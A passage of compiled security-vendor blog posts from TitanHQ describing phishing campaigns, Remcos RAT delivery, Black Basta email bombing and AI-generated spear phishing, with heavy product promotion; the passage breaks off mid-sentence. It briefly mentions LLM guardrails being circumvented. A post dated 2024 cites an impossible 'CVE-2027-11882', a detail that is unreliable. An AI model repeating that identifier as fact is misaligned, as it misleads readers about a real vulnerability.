problem is that these forms of MFA can be expensive and difficult to deploy at scale.\r\nBusinesses can greatly improve their defenses with advanced spam filter software with AI- and machine learning\r\ndetection, email sandboxing, URL rewriting, QR code checks, greylisting, SPF, DKIM, and DMARC checks, and\r\nbanners identifying emails from external sources. Effective email filtering will ensure that these malicious emails\r\ndo not land in employee inboxes. TitanHQ offers two email security solutions – SpamTitan email security and the\r\nPhishTitan anti-phishing solution for M365. The engine that powers both solutions was recently rated in 1st place\r\nfor protection in the Q4, 2024 tests by VirusBulletin, achieving a 100% malware and 100% phishing detection\r\nrate.\r\nRegular security awareness training should also be provided to all members of the workforce to raise awareness of\r\nthreats and to teach cybersecurity best practices. With the SafeTitan security awareness training platform it is easy\r\nto create and automate training courses and add in new training content when new threat actor tactics are\r\nidentified. The platform also includes a phishing simulator for reinforcing training and identifying individuals in\r\nneed of additional training.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 23 of 136\n\nFor more information on improving your defenses against phishing and malware, give the TitanHQ team a call.\r\nProduct demonstrations can be arranged on request and all TitanHQ solutions are available on a free trial.\r\nAI-Generated Voice Phishing Calls Combined with Email to Steal Gmail\r\nCredentials\r\nby G Hunt | January 26, 2025 | Phishing \u0026 Email Spam\r\nCybercriminals often devise phishing lures that can be used on as many individuals as possible, which is why they\r\noften impersonate big-name brands such as Microsoft, Apple, Facebook, and Google, since there is a high\r\npercentage chance that the emails will land in the inbox of someone that uses the products of those companies.\r\nIn the case of Google, a phishing campaign targeting Gmail account holders makes sense from the perspective of a\r\ncybercriminal as there are around 2.5 billion Gmail users worldwide. One such campaign has recently been\r\nidentified that uses a combination of an email and a phone call to obtain account credentials. Email accounts can\r\ncontain a wealth of sensitive information that can be misused or used in further attacks on an individual, and the\r\naccounts can be used for phishing and spear phishing campaigns.\r\nPhishing campaigns that combine multiple communication methods are becoming more common, such as callback\r\nphishing. With callback phishing, the scam starts with an email devoid of malicious links, scripts, and\r\nattachments. The recipient is told that a charge will be applied to their account for a subscription or free trial that\r\nis coming to an end. The user is informed that they must call the number in the email to terminate the subscription\r\nbefore the charge is applied. If the number is called, the threat actor uses social engineering techniques to trick the\r\nuser into downloading a remote access solution to remove the software and prevent the charge. The software gives\r\nthe threat actor full control of their device.\r\nThe latest campaign uses emails and phone calls in the opposite order, with initial contact made via the phone by a\r\nperson impersonating the Google support team. The reason for the phone call is to advise the Gmail user that their\r\naccount has been compromised or suspended due to suspicious activity, or that attempts are being made to recover\r\naccess.\r\nOne user received a call where a Google customer support worker told them that a family member was trying to\r\ngain access to their account and had provided a death certificate. The call was to verify the validity of the family\r\nmember’s claim. People targeted in this campaign may attempt to verify the validity of the call by checking the\r\nphone number; however, Caller ID is spoofed to make it appear that the call has come from a legitimate Google\r\ncustomer support number.\r\nThe second phase of the scam includes an email sent to the user’s Gmail account corroborating the matter\r\ndiscussed in the phone call, with the email requiring action to recover the account and reset the password. A link is\r\nprovided that directs the user to a spoofed login page where they are required to enter their credentials, which are\r\ncaptured by the scammer. There have also been reports where initial contact is made via email, with a follow-up\r\ntelephone call.\r\nPerforming such a scam at scale would require a great deal of manpower, and while telephone scams are\r\ncommonly conducted by call center staff in foreign countries, this scam involves AI-generated calls. The caller\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 24 of 136\n\nsounds professional and polite and has a native accent, but the victim is not conversing with a real person. The\r\nreason for the call is plausible, the voice very realistic, and the scam is capable of fooling even security-conscious\r\nindividuals.\r\nBusinesses looking to improve their defenses against advanced phishing scams should ensure that they cover these\r\ntypes of sophisticated phishing attempts in their security awareness training programs. Employees should be told\r\nthat threat actors may use a variety of methods for contact, often combining more than one communication\r\nmethod in the same scam. Keeping employees up to date on the latest tactics used by scammers is straightforward\r\nwith the SafeTitan security awareness training platform. New training content can easily be created in response to\r\nchanging tactics to keep the workforce up to date on the latest scams. SafeTitan also includes a phishing simulator\r\nfor reinforcing training.\r\nAn advanced email security solution is also strongly recommended for blocking the email-based component of\r\nthese sophisticated phishing scams. SpamTitan cloud based anti spam software incorporates machine learning\r\ncapable of identifying previous unseen phishing scams, ensuring phishing attempts are blocked and do not land in\r\ninboxes. In recent independent tests at VirusBulletin, SpamTitan achieved the top spot due to comprehensive\r\ndetection rates, blocking 100% of malware and phishing emails, and 99.999% of spam emails. To block\r\nsophisticated AI-generated phishing attempts you need sophisticated AI-based defenses. Give the TitanHQ team a\r\ncall today to find out more about improving your defenses against AI-based attacks.\r\nAI-Generated Phishing Emails Trick More Than 50% of Recipients\r\nby G Hunt | January 15, 2025 | Phishing \u0026 Email Spam\r\nLarge language models (LLMs) are used for natural language processing tasks and can generate human-like\r\nresponses after being trained on vast amounts of data. The most capable LLMs are generative pretrained\r\ntransformers, or GPTs, the most popular of which is ChatGPT, although there are many others including the\r\nChina-developed DeepSeek app.\r\nThese AI-powered tools have proven incredibly popular and are used for a wide range of tasks, eliminating a great\r\ndeal of human effort. They are used for creating articles, resumes, job applications, and completing homework,\r\ntranslating from one language to another, creating summaries of text to pull out the key points, and writing and\r\ndebugging code to name just a few applications.\r\nWhen these artificial intelligence tools were released for public use, security professionals warned that in addition\r\nto the beneficial uses, they could easily be adopted by cybercriminals for malicious purposes such as writing\r\nmalware code, phishing/spearphishing, and social engineering.\r\nGuardrails were implemented by the developers of these tools to prevent them from being used for malicious\r\npurposes, but those controls can be circumvented. Further, LLMs have been made available specifically for use by\r\ncybercriminals that lack the restrictions of tools such as ChatGPT and DeepSeek.\r\nEvidence has been growing that cybercriminals are actively using LLMs for malicious purposes, including writing\r\nflawless phishing emails in multiple languages. Human-written phishing emails often contain spelling mistakes\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 25 of 136\n\nand grammatical errors, making them relatively easy for people to identify but AI-generated phishing emails lack\r\nthese easily identified red flags.\r\nWhile cybersecurity professionals have predicted that AI-generated phishing emails could potentially be far more\r\neffective than human-generated emails, it is unclear how effective these AI-generated messages are at achieving\r\nthe intended purpose – tricking the recipient into disclosing sensitive data such as login credentials, opening a\r\nmalicious file, or taking some other action that satisfies the attacker’s nefarious aims.\r\nA recently conducted study set out to explore how effective AI-generated spear phishing emails are at tricking\r\nhumans compared to human-generated phishing attempts. The study confirmed that AI tools have made life much\r\neasier for cybercriminals by saving them a huge amount of time. Worryingly, these tools significantly improve\r\nclick rates.\r\nFor the study, researchers from Harvard Kennedy School and Avant Research Group developed an AI-powered\r\ntool capable of automating spear phishing campaigns. Their AI agents were based on GPT-4o and Claude 3.5\r\nSonnet, which were used to crawl the web to identify information on individuals who could be targeted and to\r\ngenerate personalized phishing messages.\r\nThe bad news is that they achieved an astonishing 54% click-through rate (CTR) compared to a CTR of 12% for\r\nstandard phishing emails. In a comparison with phishing emails generated by human phishing experts, a similar\r\nCTR was achieved with the human-generated phishing emails; however, the human version cost 30% more than\r\nthe cost of the AI automation tools.\r\nWhat made the phishing emails so effective was the level of personalization. Spear phishing is a far more effective\r\nstrategy than standard phishing, but these attacks take a lot of time and effort. By using AI, the time taken to\r\nobtain the personal information needed for the phishing attempt and develop a lure relevant to the targeted\r\nindividual was massively reduced. In the researchers’ campaign, the web was scraped for personal information\r\nand the targeted individuals were invited to participate in a project that aligned with their interests. They were then\r\nprovided with a link to click for further information. In a genuine malicious campaign, the linked site would be\r\nused to deliver malware or capture credentials.\r\nAI-generated phishing is a major cause of concern, but there is good news. AI tools can be used for malicious\r\npurposes, but they can also be used for defensive purposes and can identify the phishing content that humans\r\nstruggle to identify. Security professionals should be concerned about AI-generated phishing, but email security\r\nsolutions such as SpamTitan can give them peace of mind.\r\nSpamTitan, TitanHQ’s cloud-based anti-spam service, has AI and machine learning capabilities that can identify\r\nhuman-generated and AI-generated phishing attempts, and email sandboxing for detecting zero-day malware\r\nthreats. In recent independent tests, SpamTitan outperformed all other email security solutions and achieved a\r\nphishing and malware catch rate of 100%, a spam catch rate of 99.999%, with a 0.000% false positive rate. When\r\ncombined with TitanHQ’s security awareness training platform and phishing simulator – SafeTitan, security teams\r\nwill be able to sleep easily.\r\nFor more information about SpamTitan, SafeTitan, and other TitanHQ cybersecurity solutions for businesses and\r\nmanaged service providers, give the TitanHQ team a call. All TitanHQ solutions are available on a free trial and\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 26 of 136\n\nproduct demonstrations can be arranged on request.\r\nRemcos RAT Infections of the Rise as Threat Actors Adopt New Phishing Tactics\r\nby G Hunt | December 29, 2024 | Phishing \u0026 Email Spam, Spam Software\r\nDetections of the Remcos remote access trojan (RAT) have increased recently with threat actors adopting new\r\ntactics to deliver this popular commercially available malware. The Remcos RAT is offered under the malware-as-a-service model, where purchasers can use the malware to remotely control infected devices and steal sensitive\r\ndata.\r\nThe Remcos RAT is primarily delivered via phishing emails with malicious attachments, with each of the two\r\nmain variants delivered using distinct methods. One of the variants is distributed in phishing emails using\r\nMicrosoft Office open XML attachments that exploit a Microsoft Office memory corruption remote code\r\nexecution vulnerability (CVE-2027-11882) to execute an embedded script that downloads an intermediate payload\r\nthat will in turn deliver the Remcos RAT. The vulnerability does not affect newer Office versions, such as\r\nMicrosoft 365, only older versions prior to Office 2016.\r\nLures commonly used include fake purchase orders, where the email claims to include purchasing specifications\r\nin the attached Excel file. If opened, the spreadsheet is blurred and the user is told the document is protected, and\r\nto enable editing to view the file. In the background, the vulnerability is exploited to deliver and execute an HTA\r\nfile, triggering the processes that lead to the installation of the Remcos RAT. When delivered, the Remocos RAT is\r\ninjected into a legitimate Windows executable (RegAsm.exe).\r\nThe second variant uses a VBS attachment with an obfuscated PowerShell script to download files from a remote\r\nserver and inject code into RegAsm.exe. Since the final payload is injected into legitimate Windows processes, the\r\nmalware is often not detected by security solutions. Once installed, persistence is maintained via registry\r\nmodifications to ensure the malware remains active after a reboot. Lures used to deliver this variant include\r\npayment confirmations, with details included in the attached DOCX file.\r\nThe highest number of infections have occurred in the United States and India, and there has been a sharp rise in\r\ninfections in recent months showing that the campaigns are proving effective. A combination of technical\r\nmeasures and security awareness training will help to prevent Remcos RAT infections. Phishing campaigns such\r\nas this show why it is important to stay on top of patching and ensure that all systems are kept up to date, and to\r\nmigrate from software that has reached end-of-life to supported software versions. Endpoint security software is\r\nimportant; however, detection of the Remcos RAT can be difficult since files are not written to the hard drive.\r\nThe primary defense is an advanced email security solution. SpamTitan, TitanHQ’s spam filtering service, is an\r\nideal choice as it includes reputation checks, SPF, DKIM, \u0026 DMARC, machine-learning algorithms to identify\r\nanomalies in emails, and email sandboxing, where attachments are sent for extensive analysis including pattern\r\nfiltering. In recent tests by VirusBulletin, the engine that powers SpamTitan scored highest out of all 11 tested\r\nemail security solutions, with a 100% malware and phishing catch rate.\r\nIt is important to keep the workforce up to date on the latest security threats and to teach and reinforce security\r\nbest practices. The SafeTitan security awareness training platform makes this easy for businesses and MSPs,\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 27 of 136\n\nallowing effective security awareness training programs to be created that are tailored to individuals and user\r\nroles. The training can be automated to be delivered regularly to employees, as can phishing simulations using the\r\nSafeTitan phishing simulator to test the effectiveness of training. Businesses with Microsoft 365 would benefit\r\nfrom the PhishTitan platform. Based on the same engine that powers SpamTitan, PhishTitan helps to protect\r\nMicrosoft 365 environments from the advanced threats that Microsoft fails to block, add banners to emails from\r\nexternal sources and helps security teams rapidly mitigate phishing threats.\r\nGoogle Calendar Abused in Phishing Campaign\r\nby G Hunt | December 28, 2024 | Phishing \u0026 Email Spam\r\nCompanies in multiple sectors are being targeted in an ongoing phishing campaign involving initial contact via\r\nemail via Google Calendar-generated meeting invites. This campaign has proven effective, especially when the\r\nuser recognizes other guests. The campaign has been active throughout December, with at least 1,000 of these\r\nphishing emails identified each week, according to Check Point.\r\nThe aim of the phishing emails is to trick the recipients into clicking a link in the email or opening a Calendar file\r\nattachment (.ics), both of which will send the user to either Google Forms or Google Drawings.  Next, the user is\r\ntricked into clicking another link, which could be a support button or a fake reCAPTCHA. A click will drive the\r\nuser to the scam page, where they will be taken through a fake authentication process that captures personal\r\ninformation, and ultimately payment card information. This campaign could easily be adapted to obtain\r\ncredentials rather than payment card details, and campaigns in the past that abused Google Calendar have targeted\r\ncredentials.\r\nAn attacker only needs to obtain an individual’s email address to send the calendar invite, and the emails look\r\nexactly like a genuine invite for a meeting. Since the legitimate Google Calendar service is used to generate the\r\nphishing invites, the emails are generally not blocked by spam filtering services. Since the sender is legitimate and\r\ntrusted, the emails pass SPF, DKIM, and DMARC checks, guaranteeing delivery.\r\nDepending on the user’s settings, these may be automatically added to the user’s calendar. The threat actor can\r\nthen trigger a second email by canceling the meeting and has been doing so in this campaign. The cancellation\r\nemail also includes a hyperlink to a malicious website.\r\nThe use of Google Calendar invites in phishing is nothing new. It is effective as it ensures a large number of\r\nrequests land in inboxes, and Google Calendar will be familiar to most people, considering there are more than\r\n500 million active users of the tool.\r\nThere are simple steps to take to block these threats, although the first option will also limit legitimate\r\nfunctionality for genuine invites. To block these attempts, go into Google Calander settings, and in the event\r\nsettings switch from automatically add invitations to only show invitations I have responded to.  Also, access\r\nGmail settings and uncheck automatically add events from Gmail to my calendar. To avoid disabling the\r\nfunctionality, check the only known individuals setting in Google Calendar, which will generate an alert if the user\r\nhas had no interactions with an individual in the past.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 28 of 136\n\nIt is important to have an advanced email security solution that is capable of detecting sophisticated phishing\r\nattacks that bypass the standard reputation checks that are present in virtually all spam filtering software – SPF,\r\nDKIM, and DMARC. Advanced spam filtering solutions incorporate AI and machine learning capabilities and can\r\ndetect anomalies in inbound emails and flag them as suspicious or send them for deeper inspection in an email\r\nsandbox. In the sandbox, the message can be analyzed for malicious content, including following the link to check\r\nthe destination URL. While this campaign does not use malware, an email filtering service with email sandboxing\r\nwill also protect against malware threats.\r\nMeeting invites, calendar invites, and collaboration requests are commonly used in phishing campaigns and are\r\nsent from trusted domains that often bypass spam filtering controls, so it is important to cover these types of scam\r\nemails in security awareness training. Employees should be made aware that these requests may not be what they\r\nseem, even if they have been sent via a legitimate service. Businesses can also gauge how susceptible employees\r\nare to these types of scams using a phishing simulator. SafeTitan includes many phishing templates involving\r\ninvites from legitimate services to allow businesses to incorporate these into their simulations.\r\nCall TitanHQ today for more information on improving your defenses against phishing with the SafeTitan security\r\nawareness training platform, SpamTitan email security, and the PhishTitan anti-phishing solution for Microsoft\r\n365.\r\nTitanHQ Achieves 1st Place in Q4 Virus Bulletin Email Security Tests\r\nby G Hunt | December 23, 2024 | Industry News, Spam Software\r\nTitanHQ’s email security solutions achieved first place in Q4 performance tests by the leading security\r\ninformation portal, testing, and certification body, VirusBulletin. The security engine that powers TitanHQ’s\r\nSpamTitan email security and PhishTitan anti-phishing platform for Microsoft 365 was put to the test alongside 10\r\nother market-leading email security solutions and achieved the highest overall score out of all 11 solutions,\r\nbuilding on the joint 1st overall score in the Q3, 2024 round of tests, 2nd position in the Q3 tests, and 3rd position\r\nin the Q1, 2024 tests.\r\nThe top position was achieved with a 100% phishing catch rate, a 100% malware catch rate, and a 0.00% false\r\npositive rate. This was the third consecutive quarter that TitanHQ’s solutions had a perfect score for catching\r\nmalware and the third consecutive quarter that TitanHQ has been awarded the VBSpam+ award for outstanding\r\nperformance. “We are thrilled to have significantly outperformed our main competitors and surpassed the industry\r\naverage,” said TitanHQ CEO, Ronan Kavanagh. “Our unwavering commitment to providing unmatched email\r\nsecurity is evident in these results, and we remain dedicated to protecting our clients from evolving cyber threats.”\r\nOver the past two decades, VirusBulletin has tested, reviewed, and benchmarked enterprise-level security\r\nsolutions to determine how effective the solutions are at blocking real-world threats. VirusBulletin has a\r\nformidable reputation for providing businesses with invaluable independent intelligence about the rapidly\r\nevolving threat landscape, and businesses look to performance tests when selecting security solutions to make sure\r\nthey perform as well as the vendors’ claim. For the Q4, 2024 tests of enterprise-level anti-spam software,\r\nTitanHQ’s cloud-based anti-spam service was put to the test alongside solutions from Bitdefender, Fortinet,\r\nMimecast, N-able, Sophos, Rspamd, SEPPmail, Net at Work, and Zoho. The tests ran for 16 days in November\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 29 of 136\n\n2024 and included evaluations of almost 107,000 emails, of which 105,228 were spam and 1,315 were legitimate\r\nemails. 1,045 of the emails contained a malicious attachment and 16,825 contained a link to a web page hosting\r\nphishing content or malware.\r\nVirus Bulletin Q4, 2024 Test Scores\r\nMetric TitanHQ Score\r\nMalware catch rate 100.000%\r\nPhishing catch rate 100.000%\r\nSpam Catch (SC) rate 99.999%\r\nProject Honey Pot SC rate 99.998%\r\nMXMailData SC rate 100.000%\r\nAbusix SC rate 99.999%\r\nFalse Positive (FP) Rate 0.000%\r\nNewsletters FP rate 0.0%\r\nFinal Score 99.999%\r\n“With only two spam samples missed – one of which was from the unwanted category – no false positives of any\r\nkind, and a final score value of 99.999, SpamTitan showed the best performance in this test, ranking top for final\r\nscore,” explained VirusBulletin. “Needless to say, a well-deserved VBSpam+ certification is awarded.”\r\nVirus Bulletin 2024 Test Scores\r\nTest Period Phishing catch Rate Malware Catch Rate Spam Catch Rate Position\r\nQ1 99.91% 99.95% 99.98% 3rd\r\nQ2 99.99% 100% 99.98% 2nd\r\nQ3 99.98% 100% 99.98% 1st (Joint)\r\nQ4 100% 100% 99.99% 1st\r\nThe test results confirm that TitanHQ is a leading enterprise spam filter provider; however. TitanHQ’s spam\r\nfiltering service and anti-phishing solution for M365 are suitable for use by businesses of all sizes. While\r\nincredibly powerful and feature-rich, they are easy to implement and use. The solutions have also been developed\r\nfrom the ground up to meet the needs of MSPs to help them better protect their clients from rapidly evolving\r\nthreats. “We’ve seen a remarkable influx of new MSP customers migrating from other solutions, consistently\r\nhighlighting TitanHQ’s ability to deliver immediate and substantial threat mitigation,” said Kavanagh.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 30 of 136\n\nIf you want industry-leading email protection from spam, phishing, and malware, give the TitanHQ team a call\r\ntoday to find out more about getting started with SpamTitan and PhishTitan. Product demonstrations can be\r\narranged on request and all TitanHQ solutions are available on a free trial.\r\nSpamTitan Enhanced with Latest Skellig 9.07 Release\r\nby G Hunt | December 18, 2024 | Industry News, Spam Software\r\nTitanHQ has announced that the latest version of SpamTitan (Skellig 9.07) has been launched, offering significant\r\nenhancements to improve detection, usability, and overall security. The new version of SpamTitan Skellig builds\r\non previous versions that have been demonstrated to provide exceptional protection against malware, phishing,\r\nand spam, as evidenced by recent independent tests by VirusBulletin.\r\nIn Q3, 2024, SpamTitan achieved joint first place for overall score in the phishing, spam, and malware detection\r\ntests, and in Q4, 2024, performed even better beating all other industry-leading competitors to achieve the top spot\r\nwith an overall score of 99.999%, including a malware and phishing catch rate of 100%, a spam catch rate of\r\n99.999%, and a false positive rate of 0.000%, earning SpamTitan its third consecutive VPSpam+ award.\r\nThe latest release of the SpamTitan Skellig engine includes numerous security updates, including significant\r\nimprovements with enhanced Domain and Display Name anti-spoofing protection and updated anti-spoofing\r\nscreens. The settings for Domain and Display Name anti-spoofing have been separated to make it easier to see\r\nwhich features have been enabled and the update makes MSP’s lives easier as these split options are available at\r\nthe customer level, so there is no need to drill down to each domain-level setting. The update will reduce the time\r\nthat needs to be spent managing security defenses. Further, the update provides greater flexibility and control for\r\ninbox protection, since Display Name anti-spoofing is independent of user policies. That means it is possible to\r\nupload a custom list of Display Name/email pairs for more targeted protection. To improve usability, changes have\r\nalso been made under the cover for Quarantine Reports to ensure they are delivered more reliably and on-time\r\nTitanHQ is committed to making continuous security improvements to improve detection and simplify security\r\nmanagement to make its products easier and less time-consuming to use, ensuring users have complete control of\r\nhow protections are applied. The new version will be updated automatically for current users, and if you are yet to\r\ntry our spam filtering service, give the TitanHQ team today for help getting you started with a free trial.\r\nThreat Actors Adopt Corrupted Word Files for Phishing Campaigns\r\nby G Hunt | December 16, 2024 | Phishing \u0026 Email Spam\r\nA new phishing campaign has been identified that uses the novel tactic of attaching corrupted Microsoft Word\r\nfiles to emails. The files themselves do not contain any malicious code, so scans of the attachments by email\r\nsecurity solutions may not flag the emails as malicious.\r\nIn order to get the recipient to open the email, the threat actor impersonates the HR department or payroll team, as\r\nemployees will typically open these messages. The attached files have file names related to payments, annual\r\nbenefits, and bonuses, which employees may open without performing standard checks of the email, such as\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 31 of 136\n\nidentifying the true sender of the message. Many employees place a moderate amount of trust in Word files, as if\r\nthey contain a macro, it should not run automatically if the Word document is opened.\r\nThe threat actor relies on the employee’s curiosity to open the file and the way that operating systems handle\r\ncorrupted files. The file recovery feature of Microsoft Word will attempt to recover corrupted files. The user will\r\nbe informed that parts of the file contain unreadable content, and the user is prompted to confirm if they would\r\nlike the file to be recovered. The documents have been crafted to ensure that they can be recovered by Word, and\r\nthe recovery will present the user with a QR code that they are told they must scan to retrieve the document.\r\nThe document includes the logo of the company being targeted, and the user does not need to “enable editing” to\r\nview the contents of the document, so they may mistakenly believe they are safe. If they scan the QR code using\r\ntheir mobile device, they will be directed to a phishing page where they are asked to enter their Microsoft\r\ncredentials on a phishing page that is an exact match of the genuine Microsoft login prompt.\r\nBusinesses with spam filter software may not be protected as email security solutions often fail to scan corrupted\r\nfiles. For instance, the phishing emails bypass Outlook spam filters according to the researchers at Any.Run who\r\nidentified the campaign. That means the emails may be delivered to inboxes, especially as the messages do not\r\ncontain any content in the body of the email indicative of a phishing attempt.\r\nIf the user opens the file and scans the QR code, they will switch from their desktop or laptop to their mobile\r\nphone. Mobile devices rarely have the same level of security protection, so corporate anti-phishing controls such\r\nas web filters will likely be bypassed.\r\nThreat actors are constantly developing new ways to trick employees in their phishing campaigns, which is why it\r\nis important to run security awareness training programs continuously, updating the training content with new\r\ntraining material in response to threat actors’ changing tactics. By warning employees about this method, they\r\nshould recognize the scam for what it is if they receive an email with a corrupted file attachment. That is easy to\r\ndo with a security awareness training platform such as SafeTitan. New training content can be quickly created and\r\nrolled out to all users as part of their monthly allocation of training modules. It is also easy to add this type of\r\nthreat to the SafeTitan phishing simulator to test how employees respond to this new threat type.\r\nAs the researchers demonstrated, Microsoft fails to detect the threat, demonstrating why it is important to bolster\r\nyour M365 phishing defenses with a third-party solution, such as PhishTitan from TitanHQ. PhishTitan integrates\r\nseamlessly with Microsoft 365 to augment protection and catches the phishing threats that Microsoft misses.\r\nPhishTitan will also add a banner to all inbound emails that come from external sources, giving users a clear flag\r\nthat these emails are not genuine. The HR department and payroll have internal email addresses.\r\nAn email security solution with email sandboxing is also advisable for deep inspection of file attachments,\r\nincluding the ability to read QR codes. Spam filters for incoming mail should also have machine learning and AI-based detection capabilities for identifying emails that deviate from the messages typically received by the\r\nbusiness.\r\nAll of these features are part of TitanHQ’s email security suite. Give the team a call today to find out more.\r\nEmail Bombing Adopted by Ransomware Groups for Initial Access\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 32 of 136\n\nby G Hunt | December 12, 2024 | Network Security, Security Awareness\r\nIn this post, we explore some of the tactics used by the Black Basta ransomware group to gain initial access to\r\nvictims’ networks. Black Basta is a ransomware-as-a-service (RaaS) group that first appeared in April 2022. After\r\ngaining access to victims’ networks, the group escalates privileges and moves laterally within the network,\r\nidentifying sensitive data and exfiltrating files before running its encryption processes. The group then drops a\r\nransomware note and demands payment to prevent the publication of the stolen data and to obtain the keys to\r\ndecrypt the encrypted files. The group targets multiple industry sectors including healthcare organizations,\r\nprimarily in North America, Europe, and Australia.\r\nThe group’s tactics are constantly evolving; however, one of the most common tactics used for initial access is\r\nemail phishing, either by sending an email with a hyperlink to a malicious website or an infected email\r\nattachment. The group’s phishing campaigns aim to deliver Qakbot malware, which is used to provide persistent\r\naccess to victims’ networks (via autorun entries and scheduled tasks), and for running PowerShell scripts to\r\ndisable security solutions. The malware is then used to deliver additional malicious payloads such as Cobalt\r\nStrike, and legitimate software tools such as Splashtop, Mimikatz, and Screen Connect.\r\nRecently, the group has been observed using a new tactic called email bombing as an alternative way of gaining\r\ninitial access to networks. With email bombing, the selected targets’ email addresses are sent large volumes of\r\nspam emails, often by signing the user up to multiple mailing lists or spamming services simultaneously. After\r\nreceiving a large volume of spam emails, the user is prepared for the next stage of the attack.\r\nThe threat actor reaches out to the user, often via Microsoft Teams or over the phone, and impersonates a member\r\nof the IT help desk. The threat actor claims they have identified a problem with spam email and tells the user that\r\nthey need to download a remote management tool to resolve the issue.\r\nIf the user agrees, they are talked through downloading one of several tools such as QuickAssist, AnyDesk,\r\nTeamViewer, or ScreenConnect. The threat actor then uses that tool to remotely access the user’s device. These\r\ntools may be downloaded directly from the legitimate vendor’s domain; however, since many businesses have\r\ncontrols in place to prevent the installation of unauthorized remote access tools, the installation executable file\r\nmay be downloaded from SharePoint. Once installed, the threat actor will use the remote access to deliver a range\r\nof payloads.\r\nEmail bombing is a highly effective tactic as it creates a need to have an issue resolved. Once on the phone or in\r\nconversation via Microsoft Teams, the threat actor is able to try other methods for installing the remote access\r\ntools if they fail due to the user’s security settings.\r\nEmail bombing may be used by multiple threat actors for initial access, and phishing remains the most common\r\nmethod for gaining a foothold in networks for follow-on attacks. Implementing defenses against these tactics will\r\nsignificantly improve your defenses and make it harder for threat actors to breach your network.\r\nAn Advanced Spam Filter\r\nAn advanced spam filter is a must, as it can identify and block phishing attempts and reduce the effectiveness of\r\nemail bombing. Next-gen spam filtering software incorporates AI and machine learning algorithms to thoroughly\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 33 of 136\n\nassess inbound emails, checking how they deviate from the emails typically received by the business, and helping\r\nto flag anomalies that could indicate novel phishing attempts.\r\nA spam filter should also incorporate email sandboxing in addition to antivirus software protection, as the latter\r\ncan only detect known threats. Novel malware variants and obfuscated malware are often missed by antivirus\r\nsoftware, so a sandbox is key to blocking malware threats. After passing initial checks, an email is sent to the\r\nemail sandboxing service for deep analysis, where behavior is checked for malicious actions, such as attempted\r\nC2 communications and malware downloads.\r\nSpamTitan incorporates machine learning algorithms, sandboxing, and link scanning to provide advanced\r\nprotection against phishing and malware attacks. SpamTitan was recently rated the most effective spam filter in\r\nrecent independent tests by VirusBulletin, blocking 100% of phishing emails, 100% of malware, and 99.99% of\r\nspam emails, giving the solution the highest overall score out of all 11 spam filtering services put to the test.\r\nSecurity Awareness Training\r\nIt is important to provide regular security awareness training to the workforce, including all employees and the C-suite. The most effective training is provided regularly in small chunks, building up knowledge of threats and\r\nreinforcing security best practices. This is easiest with a modular computer-based training course. When new\r\ntactics such as email bombing are identified, they can be easily incorporated into the training course and rolled out\r\nto end users to improve awareness of specific tactics. Also consider running phishing simulations, as these have\r\nbeen shown to be highly effective at reinforcing training and identifying knowledge gaps that can be addressed\r\nthrough further training.\r\nTitanHQ makes this as easy as possible with the SafeTitan security awareness training and phishing simulation\r\nplatform. The platform includes hundreds of engaging and enjoyable training modules covering all aspects of\r\nsecurity and threats employees need to be aware of, while the phishing simulation platform makes it easy to create\r\nand automate internal phishing simulations, which automatically trigger relevant training content if the user fails\r\nthe simulation.\r\nGive the TitanHQ team a call today for further information on SpamTitan and Safetitan, for a product\r\ndemonstration, or to arrange a free trial.\r\nProtect Your Business Against Holiday Season Cyber Threats\r\nby G Hunt | November 30, 2024 | Internet Security, Phishing \u0026 Email Spam\r\nHoliday season officially started the day after Thanksgiving in the United States, or Black Friday as it is now\r\nknown. Taking its name from a term used by police officers in Philadelphia to describe the chaos in the city\r\ncaused by the deluge of suburban shoppers heading to the city to do their holiday shopping, it has become a day\r\nwhen retailers offer bargains to entice the public to buy their goods and services. While the jury is still out on how\r\ngood many of those bargains are, the consensus is that there are bargains to be found in stores and online, with the\r\nofficial day for the latter being the Monday after Black Friday – Cyber Monday.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 34 of 136\n\nThe holiday season for shoppers is boom time for cybercriminals who take advantage of the increase in online\r\nshoppers looking to buy gifts for Christmas and pick up a bargain of two. Many people time major purchases to\r\ntake advantage of Black Friday and Cyber Monday offers and cybercriminals are poised to pounce on the\r\nunwary. The losses to scams over the holiday period are staggering. According to the Federal Bureau of\r\nInvestigation (FBI), more than $73 million was lost to holiday season scams in 2022; however, the true total is\r\nlikely to be considerably higher since many losses go unreported. Those figures do not include the losses to\r\nphishing, malware, ransomware, BEC attacks, and other cyberattacks that occur over the holiday period. For\r\ninstance, the surge in ransomware attacks over Thanksgiving weekend and Christmas when the IT staff is spread\r\nthin.\r\nGiven the heightened risk of scams and cyberattacks over the holiday season, consumers should be on their guard\r\nand take extra care online and ensure that vendors are legitimate before handing over their card details and double-checking the legitimacy of any email requests. While consumers face elevated risks during the holiday season, so\r\ndo businesses. There are end-of-year deadlines to meet and it’s a short month with many workers taking annual\r\nleave over Christmas and the New Year. As the year draws to a close it is common for vigilance to slip, and threat\r\nactors are ready to take advantage. Businesses need to ensure that their defenses are up to scratch, especially\r\nagainst phishing – the most common initial access vector in cyberattacks – as a slip in vigilance can easily lead to\r\na costly cyberattack.\r\nBusinesses can take several proactive steps to ensure they are protected against holiday season cyber threats, and\r\nconducting a security awareness training session is a good place to start. Employees should be reminded about the\r\nincrease in malicious cyber activity over the holiday period and be reminded about the risks they may 